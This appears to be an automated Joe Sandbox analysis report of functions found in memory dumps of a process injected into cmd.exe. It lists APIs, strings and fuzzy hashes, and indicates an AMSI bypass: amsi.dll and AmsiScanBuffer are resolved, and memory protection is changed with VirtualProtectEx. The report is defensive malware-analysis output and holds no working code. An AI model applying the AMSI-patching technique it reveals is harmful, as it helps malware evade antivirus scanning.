Instruction Fuzzy Hash: 89010975219746D2EF249B35E8487A962A2BF86B85F940034DB6E063A4EF3DC44CCB41

Function 000001F119D51AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001F119D51AF4
StrCmpNIW.SHLWAPI ref: 000001F119D51B0E
lstrlenW.KERNEL32 ref: 000001F119D51B1D
StrCpyW.SHLWAPI ref: 000001F119D51B32

Strings

\\?\, xrefs: 000001F119D51B02

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 8552a58c292d64d3b96bf97c84ac928d893fac020917a3e998aeb00a4c52ae49
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: C4F04F7230868AE2FF208F31F5843A96372F745BC8FC44035DB5A46954DE6CC688CB40

Function 000001F1197D1AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001F1197D1AF4
StrCmpNIW.SHLWAPI ref: 000001F1197D1B0E
lstrlenW.KERNEL32 ref: 000001F1197D1B1D
StrCpyW.SHLWAPI ref: 000001F1197D1B32

Strings

\\?\, xrefs: 000001F1197D1B02

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: cbd3ff801cab0db56494ad77b16c5690f9502d8c90fe2573cdb34ee3c3b508be
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 9EF04F7230869AE2EB208B35F5843A96362FB44BC8FC44035DB6A46954EE7DC68CCF00

Function 000001F119D5B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001F119D5B929
GetProcAddress.KERNEL32 ref: 000001F119D5B93F
FreeLibrary.KERNEL32 ref: 000001F119D5B95B

Strings

CorExitProcess, xrefs: 000001F119D5B938
mscoree.dll, xrefs: 000001F119D5B920

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 635f1a669ebb73b13ff402a909f102c3afc2e53c6369ca91dde3e08c75266cbd
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 80F01D7121964AE1FF148F34A8953B96372AB897A0FD40639DB7B455E8DF3DC488CB80

Function 000001F119D53708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001F119D5275A), ref: 000001F119D5372A
StrCpyW.SHLWAPI ref: 000001F119D5373A
StrCatW.SHLWAPI ref: 000001F119D53746
PathCombineW.SHLWAPI(?,?,00000000,000001F119D5275A), ref: 000001F119D53754

Strings

\\.\pipe\, xrefs: 000001F119D53720

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: e810479e23e637bff84b70c39f119b15e133311f6d13ac21fb57fea9d7376835
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: A2F05474708B8AD2EE148B72B9141A5A262A748FC0FC44034EF2707714DE28C485C740

Function 000001F1197DB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001F1197DB929
GetProcAddress.KERNEL32 ref: 000001F1197DB93F
FreeLibrary.KERNEL32 ref: 000001F1197DB95B

Strings

CorExitProcess, xrefs: 000001F1197DB938
mscoree.dll, xrefs: 000001F1197DB920

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 8a1376443e971a596884637b1c71841854bd4ccc17046b5f9150aa7467e27495
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: D0F03072319656E1EE148B34A8953B963A6EF897E0FD40639DB7B495E4DF2CC44CCB00

Function 000001F1197D3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000001F1197D275A), ref: 000001F1197D372A
StrCpyW.SHLWAPI ref: 000001F1197D373A
StrCatW.SHLWAPI ref: 000001F1197D3746
PathCombineW.SHLWAPI(?,?,00000000,000001F1197D275A), ref: 000001F1197D3754

Strings

\\.\pipe\, xrefs: 000001F1197D3720

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 79606d619097c5c076505ce5ae3f690df5618a6af76cc1b8d88d1ec43b78d385
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 1CF08975708B96E1EE548B33B9541B95252BF48FC4FC44031EF2707B14EE2CC4498B00

Function 000001F119D51E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000001F119D51E47
GetProcAddress.KERNEL32 ref: 000001F119D51E57
Sleep.KERNEL32 ref: 000001F119D51E67

Strings

amsi.dll, xrefs: 000001F119D51E40
AmsiScanBuffer, xrefs: 000001F119D51E50

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 78c4c231efcc6ef220593c037e25ec94aa00fd9cb3d5b68f438408f4984c9035
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 01D06730A1964AF5FE086F31E8543F42273BB64B41FC44435C72F012A0DE2CC599C380

Function 000001F119D55810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F119D55896

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 4bdd4982941be1181e3666a2caf18238d183a8bbbfc7684af560c43f27619514
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 9602B83621DB85D6EB61CB65E4903AAB7B1F384794F904025EB9E87BA8DF7CC454CB00

Function 000001F1197D5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F1197D5896

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8bf76e9ed8b7a9df262ee4c92949d0c5c8141740679972bc7da9694d46b287b1
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: B902B83621DB85D6E7608B65E4903AEB7A1F7C4B94F504025EB9E87BA8DF78C458CF00

Function 000001F119D52C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001F119D52CAD
TlsGetValue.KERNEL32 ref: 000001F119D52CBC
TlsGetValue.KERNEL32 ref: 000001F119D52CCB
TlsSetValue.KERNEL32 ref: 000001F119D52E0F
TlsSetValue.KERNEL32 ref: 000001F119D52E1E
TlsSetValue.KERNEL32 ref: 000001F119D52E2D

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 8923fe9165c6dcb316e261b7006bdc95f20c05698ae96fc2f94ca465734b02b2
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 96515335618646E7EB64CB36E4406BAB3B6F784B84F904139AF6B43754DF38C949CB40

Function 000001F1197D2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001F1197D2CAD
TlsGetValue.KERNEL32 ref: 000001F1197D2CBC
TlsGetValue.KERNEL32 ref: 000001F1197D2CCB
TlsSetValue.KERNEL32 ref: 000001F1197D2E0F
TlsSetValue.KERNEL32 ref: 000001F1197D2E1E
TlsSetValue.KERNEL32 ref: 000001F1197D2E2D

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: a51ed8b8a4b9c674abbe6fbbf88e13268596f3924a008aa4d3717c90ffd45fb3
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 16516E36608602E7E764CB26A4546AE73A2FB89BD4F904139DF6B43754DB38C84ACF40

Function 000001F119D52AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001F119D52AE1
TlsGetValue.KERNEL32 ref: 000001F119D52AF0
TlsGetValue.KERNEL32 ref: 000001F119D52AFF
TlsSetValue.KERNEL32 ref: 000001F119D52C3B
TlsSetValue.KERNEL32 ref: 000001F119D52C4A
TlsSetValue.KERNEL32 ref: 000001F119D52C59

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: fa9b28e2b4d86fc6fd49d8dec0697fd20958d027a5e362716a24ad52205b72fa
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: AF514435618646E7EB24CF36A8406B9B3B2F785B84F904129EF6B43758DF38D949CB40

Function 000001F1197D2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000001F1197D2AE1
TlsGetValue.KERNEL32 ref: 000001F1197D2AF0
TlsGetValue.KERNEL32 ref: 000001F1197D2AFF
TlsSetValue.KERNEL32 ref: 000001F1197D2C3B
TlsSetValue.KERNEL32 ref: 000001F1197D2C4A
TlsSetValue.KERNEL32 ref: 000001F1197D2C59

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 7c1a810be19e154511d0584d9644d7746da96506bfb15c7a21f42d1dc8d54db4
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: A7514036218642E6E724DF36A4406BA73A2FB85BD4F904129DF6B43754EB79C84ACF00

Function 000001F119D55E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F119D55E66

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 703432165de24b7b3b95c45a5b736cc0d8453b7410889a74678311cba07cdb7a
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: DC61BC3612DB89D6FB658B25E45436AB7B1F388748F900125FB9E87BA8DB7CC540CB00

Function 000001F1197D5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F1197D5E66

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 9030f3efd319100d5c301f7f20aa3f71b4970118bf80dd58d812ca04f110e1c7
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: FB61D83612CB41D7E7608B25E44476EB7E2F788784F900126EB9E47BA8DB78C5488F01

Function 000001F119D53EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F119D53A5B), ref: 000001F119D53EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F119D53A5B), ref: 000001F119D53F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F119D53A5B), ref: 000001F119D53F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F119D53A5B), ref: 000001F119D53F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F119D53A5B), ref: 000001F119D53F68

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 93901da63dc3498e1e2902e7421700ce0deacc901b14a31596839f061cd07c77
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: D8111C36609746E3FF248B61E4042AAA7B1FB45B80F840136DB6E03794EF7DC994C784

Function 000001F1197D3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3A5B), ref: 000001F1197D3F68

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: e8697e66de8636978fa6b156ef569a72760f9f61d9d5417f0d4b0f49bc2a0a74
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: FE111C36609746E3EB24CB35E4043AA67B1FB45BC4F540036EBAE03794EB7DC9588B84

Function 000001F119D58CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F119D58CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F119D58D62
RtlUnwindEx.NTDLL ref: 000001F119D58DBC

Strings

csm, xrefs: 000001F119D58D49

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
